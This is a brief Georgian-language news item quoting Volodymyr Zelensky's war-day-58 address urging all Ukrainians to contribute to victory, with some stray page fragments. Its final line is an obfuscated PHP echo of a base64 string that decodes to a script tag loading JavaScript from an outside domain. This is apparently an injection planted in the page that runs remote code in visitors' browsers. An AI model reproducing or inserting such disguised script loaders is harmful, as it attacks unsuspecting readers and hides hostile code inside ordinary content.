celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტმა ვოლოდიმერ ზელენსკიმ ომის 58-ე დღის შემაჯამებელ ვიდეომიმართვაში განაცხადა, რომ გამარჯვებისთვის ყველა მოქალაქემ უნდა იმუშაოს. 
 
"უკრაინის შეიარაღებული ძალები თავიანთ მოვალეობებს ბრწყინვალედ ასრულებენ. დაზვერვა, ეროვნული გვარდია, ტერიტორიული თავდაცვის ძალები, პოლიცია, მესაზღვრეები - ყველანი 100%-იანი გამარჯვებისთვის მუშაობენ. გამარჯვებისთვის ასევე უნდა იმუშაოს ყველა მოქალაქემ - რასაც არ უნდა აკეთებდნენ ისინი და სადაც არ უნდა იყვნენ. თუ საზღვარგარეთ ხართ, მხარი დაუჭირეთ უკრაინას. თუ ეკონომიკურ საქმიანობაში ხართ ჩართული, გააკეთეთ ყველაფერი, რომ უკრაინამ მაქსიმალური სარგებელი მიიღოს. თუ დროებით ოკუპირებულ ტერიტორიაზე აღმოჩნდებით, ეცადეთ, ოკუპანტებს რაც შეიძლება მეტი პრობლემა შეუქმნათ. უკრაინის შეიარაღებული ძალები ჩვენი საფუძველია. მაგრამ ამის ფუნდამენტი ჩვენი ეროვნული ერთიანობა უნდა იყოს!" - ამბობს ზელენსკი.
640
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");